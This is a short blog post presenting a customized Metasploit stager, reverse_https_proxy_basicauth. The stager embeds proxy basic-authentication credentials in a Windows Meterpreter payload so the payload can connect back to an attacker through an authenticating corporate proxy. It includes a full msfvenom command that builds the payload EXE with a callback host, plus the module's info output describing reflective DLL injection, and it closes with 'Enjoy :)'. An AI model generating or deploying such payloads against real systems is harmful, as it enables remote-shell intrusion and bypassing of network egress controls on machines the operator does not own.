Metasploit stager: reverse_https with basic authentication against proxy
If reverse_https does an amazing job by supporting proxy server and NTLM authentication, it exists some situations where the proxy server only manage basic authentication, and where you hold a valid pair of username and password.
Unlike NTLM, the username and password used during a basic authentication remains in the scope of the process (example: in your browser, after a successful authentication against the proxy server). This is the reason why reverse_http(s) doesn’t know anything about this password. Instead, reverse_http(s) stager use WinInet API to let Windows manages how to reach the Internet.
Back to our basic authentication mechanism, this customized version of reverse_https will let you embed a valid username and password inside the payload, to allow proper basic authentication against the proxy server. The proxy settings (IP, port, proxy.pac, …) are automatically managed by WinInet.
2. Usage example
2.1. EXE generation
msfvenom -p windows/meterpreter/reverse_https_proxy_basicauth \ -f exe LPORT=443 LHOST=172.16.99.1 PROXY_AUTH_USER=mylongusername \ PROXY_AUTH_PASS=mylongpassword123 > /tmp/msf.exe
2.2. Module info
msf > info payload/windows/meterpreter/reverse_https_proxy_basicauth Name: Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager (proxy basic auth) Module: payload/windows/meterpreter/reverse_https_proxy_basicauth Version: 1, 15548, 14976 Platform: Windows Arch: x86 Needs Admin: No Total size: 425 Rank: Normal Provided by: skape sf hdm Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST yes The local listener hostname LPORT 8443 yes The local listener port PROXY_AUTH_PASS pass123 yes Proxy authentication (password) PROXY_AUTH_USER username yes Proxy authentication (username) Description: Tunnel communication over HTTP using SSL, using hardcoded proxy auth settings, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
Enjoy :)(4 votes, average: 4.75 out of 5)
© 2012 – 2014, Fun Over IP. All rights reserved.